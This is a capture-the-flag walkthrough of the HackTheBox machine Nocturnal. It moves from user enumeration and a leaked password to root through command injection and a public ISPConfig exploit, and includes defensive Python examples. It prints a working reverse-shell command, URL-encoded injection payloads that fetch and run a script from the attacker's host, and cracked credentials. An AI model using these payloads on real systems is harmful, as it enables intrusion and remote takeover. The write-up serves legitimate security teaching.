HTB Nocturnal Writeup (Walkthrough)
Introduction
Nocturnal is an easy-difficulty Linux machine on HackTheBox that provides an engaging challenge focused on web application security and privilege escalation. This writeup documents my methodical approach to compromising the machine, from initial reconnaissance to obtaining root access.
The machine features a web application with file upload functionality, which leads to discovering sensitive credentials through careful enumeration. The path to root involves exploiting a command injection vulnerability in the admin panel, cracking password hashes from a database, and finally leveraging a known vulnerability in ISPConfig 3.2 to achieve root privileges.
This machine demonstrates several common web application security flaws:
- Information disclosure through accessible files
- Command injection through insufficient input sanitization
- Credential reuse across different services
- Unpatched software with known vulnerabilities
Throughout this writeup, I’ll provide detailed explanations of each technique used, the underlying vulnerabilities, and the thought process behind the exploitation path. This serves as both documentation of the penetration test and a learning resource for understanding web application security concepts.
Let’s begin by exploring the initial attack surface of the machine.
Initial Reconnaissance
First, I performed a port scan using Nmap to identify open services:
nmap -sC -sV -oA Nocturnal nocturnal.htb
Results showed only two open ports:
- Port 22: SSH (OpenSSH 8.2p1)
- Port 80: HTTP (nginx 1.18.0)
Web Application Enumeration
Accessing the web application at http://nocturnal.htb, I found a login page with registration functionality.
- Created a new user:
- Username: ds
- Password: password123
- After login, I discovered a file upload page with restrictions:
- Only specific file types were allowed: pdf, doc, docx, xls, xlsx, odt
- Uploaded an xlsx file which was successfully listed under “Your Files”
- URL pattern: http://nocturnal.htb/view.php?username=ds&file=ds.xlsx
Parameter Fuzzing
Used ffuf to check for other usernames in the view.php parameter:
ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=ds.xlsx' -w common.txt -H 'Cookie: PHPSESSID=23gacrglstnhn5g5h2b9op9mo2' -fs 2985
Discovered three existing usernames:
- admin
- amanda
- ds (my own account)
Credential Discovery
Accessing the file viewer for amanda’s account at:
http://nocturnal.htb/view.php?username=amanda&file=ds.xlsx
Found a privacy.odt file available for download, which contained sensitive information:
Dear Amanda, Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. …
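The root cause behind both the username enumeration and the read of amanda's file is that view.php selects the directory from the query string rather than from the session. The following added example (my own code, not the box's PHP) models that handler in Python over a constructed in-memory stand-in for the upload directories, with the flawed lookup beside a hardened one that binds the listing to the logged-in user and answers identically for "not your account" and "no such account", so a size filter like ffuf's -fs has nothing to key on. The usernames and filenames are taken from the writeup; the file contents are placeholders.

```python
import re
from typing import Dict, List, Optional

# Constructed stand-in for the per-user upload directories behind view.php
# (assumption: one directory per account, keyed by username; the contents
# are placeholders, not the real files from the machine).
UPLOADS: Dict[str, Dict[str, bytes]] = {
    "ds": {"ds.xlsx": b"<constructed xlsx>"},
    "amanda": {"privacy.odt": b"<constructed odt>"},
    "admin": {},
}

# Usernames and filenames the handler is willing to touch at all:
# one path component, no slashes, no shell or HTML metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def list_files_vulnerable(session_user: str, requested_user: str) -> Optional[List[str]]:
    """Mirrors the flaw described in the writeup: the directory is chosen from
    the query-string username alone, so any logged-in user can list any
    account. Unknown users also get a different response than known ones,
    which is what makes a response-size filter useful for enumeration."""
    user_dir = UPLOADS.get(requested_user)
    if user_dir is None:
        return None  # distinguishable "no such user" answer
    return sorted(user_dir)


def list_files_hardened(session_user: str, requested_user: str) -> Optional[List[str]]:
    """Binds the listing to the authenticated session. 'Not your account' and
    'no such account' produce the same answer, so nothing can be enumerated."""
    if not SAFE_NAME.match(requested_user) or requested_user != session_user:
        return None
    return sorted(UPLOADS.get(session_user, {}))


def read_file_hardened(session_user: str, requested_user: str, filename: str) -> Optional[bytes]:
    """Same ownership check for the file parameter, plus rejection of any
    name that is not a plain single path component ('..' included)."""
    if list_files_hardened(session_user, requested_user) is None:
        return None
    if not SAFE_NAME.match(filename) or filename in (".", ".."):
        return None
    return UPLOADS[session_user].get(filename)
```

The hardened functions deliberately return the same value whether the requested account is someone else's or does not exist; any difference in status code, body length or timing between those two cases is what turns an authorization bug into an account-enumeration oracle.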
Accessing Admin Panel
- Logged in as amanda using the discovered credentials:
- Username: amanda
- Password: arHkG7HAI68X8s1J
- Found an “Admin Panel” option which provided access to:
- File structure viewer (PHP files only)
- File content viewer
- Backup creation functionality
Command Injection Vulnerability
Examining the admin.php source code, I identified a critical command injection vulnerability in the backup function:
$command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";
The $password parameter was insufficiently sanitized, despite an attempt at filtering it with the cleanEntry() function:
function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];
    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }
    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}
This function could be bypassed using newline characters (%0A) and tab characters (%09) instead of spaces, since neither character is on the blacklist and the shell treats both as argument separators.
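To make the weakness concrete from the defender's side, here is an added example (my own Python, not code from the machine or from ISPConfig) that ports the cleanEntry() blacklist, shows that a decoded newline/tab string passes it untouched, and then puts the two real fixes beside it: an allowlist that only admits characters a backup password needs, and building the zip invocation as an argument vector with no shell at all, so whitespace and metacharacters in the password can no longer be interpreted. The allowlist pattern, the 8 to 64 length bounds and the run_backup() wrapper are my assumptions; the zip arguments are the ones from the admin.php command above.

```python
import re
import shlex
import subprocess
from typing import List, Optional
from urllib.parse import unquote

# Python port of the blacklist from the page's cleanEntry().
BLACKLIST_CHARS = [';', '&', '|', '$', ' ', '`', '{', '}', '&&']


def clean_entry_blacklist(entry: str) -> Optional[str]:
    """Port of cleanEntry(): None on a hit, the input otherwise.
    htmlspecialchars() is left out on purpose: it protects HTML output and
    does nothing to make a string safe inside a shell command line."""
    for ch in BLACKLIST_CHARS:
        if ch in entry:
            return None
    return entry


# Allowlist (assumed policy): only characters a backup password legitimately
# needs. Everything else, newline and tab included, is refused rather than
# enumerated one metacharacter at a time.
PASSWORD_ALLOWLIST = re.compile(r"^[A-Za-z0-9._-]{8,64}$")


def clean_entry_allowlist(entry: str) -> Optional[str]:
    return entry if PASSWORD_ALLOWLIST.match(entry) else None


def build_backup_argv(password: str, backup_file: str) -> List[str]:
    """The page's zip invocation as an argument vector. With no shell in the
    picture the password reaches zip as exactly one literal argument,
    whatever it contains; zip expands the -x pattern itself."""
    return ["zip", "-x", "./backups/*", "-r", "-P", password, backup_file, "."]


def shell_safe_command(argv: List[str]) -> str:
    """If a shell string is unavoidable (PHP's shell_exec), quote every
    argument; shlex.quote is the Python counterpart of escapeshellarg()."""
    return " ".join(shlex.quote(a) for a in argv)


def run_backup(password: str, backup_file: str, log_path: str) -> int:
    """Hardened equivalent of the admin.php backup (assumed wrapper):
    validate first, then exec without a shell, output captured to the log."""
    if clean_entry_allowlist(password) is None:
        raise ValueError("password contains characters outside the allowlist")
    with open(log_path, "ab") as log:
        return subprocess.run(build_backup_argv(password, backup_file),
                              stdout=log, stderr=subprocess.STDOUT,
                              shell=False).returncode
```

The two layers are independent: the allowlist is the input-validation fix, and the argv form is the fix that holds even if validation is later loosened, because no shell ever parses the password. Blacklists of shell metacharacters fail in exactly the way this box shows, one unlisted character at a time.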
Gaining Initial Access
- Set up a netcat listener:
nc -lvnp 2244
- Created a shell.sh file with a reverse shell payload:
sh -i >& /dev/tcp/10.10.16.59/2244 0>&1
- Started a Python HTTP server to host the shell script:
python3 -m http.server
- Executed the command injection in two steps:
- First, download the shell script:
password=%0Abash%09-c%09"wget%0910.10.16.59/shell.sh"%0A&backup=
- Then execute it:
password=%0Abash%09-c%09"bash%09shell.sh"%0A&backup=
- Successfully gained a shell as the web server user.
User Flag
- Discovered a SQLite database:
$ cd /var/www/nocturnal_database
$ ls
nocturnal_database.db
- Set up a Python HTTP server to download the database:
python3 -m http.server 2245
- Examined the database with DB Browser for SQLite and found multiple user password hashes:
- admin:d725aeba143f575736b07e045d8ceebb
- amanda:df8b20aa0c935023f99ea58358fb63c4
- tobias:55c82b1ccd55ab219b3b109b07d5061d
- Found the only non-web user in /home:
$ cd /home
$ ls
tobias
- Cracked the password hash using John the Ripper:
sudo john hash_pass.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
- Result: tobias:slowmotionapocalypse
- SSH as tobias and obtain the user flag:
$ ssh tobias@nocturnal.htb
$ cat user.txt
9e5f92e51ac10bd0d9dafafe4692f506
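The hashes came out of the database as bare 32-character hex strings, which is why --format=Raw-MD5 cracked tobias's password from rockyou in one pass: no salt, no work factor. The following added example (my own Python, not the application's code) does two things a defender would want at this point: triage the three rows from the writeup for the unsalted-MD5 pattern, and show the storage scheme that should have been used instead, salted PBKDF2-HMAC-SHA256 from the standard library with a constant-time check. The iteration count and the encoding format are my assumptions; the usernames and hashes are the ones listed above.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, List

# Constructed copy of the rows pulled from nocturnal_database.db;
# the hash values are the ones shown in the writeup.
USER_ROWS: Dict[str, str] = {
    "admin": "d725aeba143f575736b07e045d8ceebb",
    "amanda": "df8b20aa0c935023f99ea58358fb63c4",
    "tobias": "55c82b1ccd55ab219b3b109b07d5061d",
}

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def unsalted_md5_accounts(rows: Dict[str, str]) -> List[str]:
    """Triage helper: 32 hex characters with no salt and no algorithm prefix
    is consistent with raw MD5, the format john cracked here. Every account
    returned should be treated as having a recoverable password."""
    return sorted(user for user, h in rows.items() if HEX32.match(h))


# Salted, iterated storage. The iteration count is an assumption; tune it
# to the hardware so a verification takes a noticeable fraction of a second.
ITERATIONS = 210_000


def hash_password(password: str) -> str:
    """Fresh 16-byte salt per password, so identical passwords (the
    credential reuse seen on this box) no longer produce identical hashes."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    """Recomputes with the stored salt and iteration count and compares in
    constant time. Anything not in the expected format (a bare MD5 row, for
    instance) is refused rather than compared."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

A practical migration path is to keep the old column, re-hash each user with hash_password() on their next successful login, and refuse logins against any row still matching HEX32 once a cut-off date passes.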
Privilege Escalation
- Checked for running services:
tobias@nocturnal:~$ ss -tuln
- Found several interesting internal services, including a web server on port 8080
- Set up SSH port forwarding to access the internal web service:
ssh tobias@nocturnal.htb -L 9090:127.0.0.1:8080
- Accessing http://127.0.0.1:9090 revealed an ISPConfig login page
- Identified ISPConfig version 3.2 from the CSS links:
<link rel='stylesheet' href='../themes/default/assets/stylesheets/ispconfig.css?ver=3.2' />
- Found a known vulnerability (CVE-2023-46818) with an available exploit: https://github.com/bipbopbup/CVE-2023-46818-python-exploit/
- Used the exploit with the previously cracked password:
python3 ./exploit.py http://127.0.0.1:9090 admin slowmotionapocalypse
- Successfully gained root shell and obtained the root flag:
ispconfig-shell# cat /root/root.txt
45631dfea44685a8737a235746dc1f92
Summary
This machine involved several key steps:
- Web application enumeration and discovery of a file viewer vulnerability
- Finding leaked credentials in an accessible document
- Exploiting a command injection vulnerability in the admin panel
- Accessing a database with user credentials
- Cracking password hashes to gain SSH access
- Using SSH port forwarding to access an internal service
- Exploiting a known vulnerability in ISPConfig 3.2 to gain root privileges
The path to root demonstrated multiple common web application vulnerabilities and the importance of proper input sanitization, as well as the risk of using the same password across multiple services.
Done!

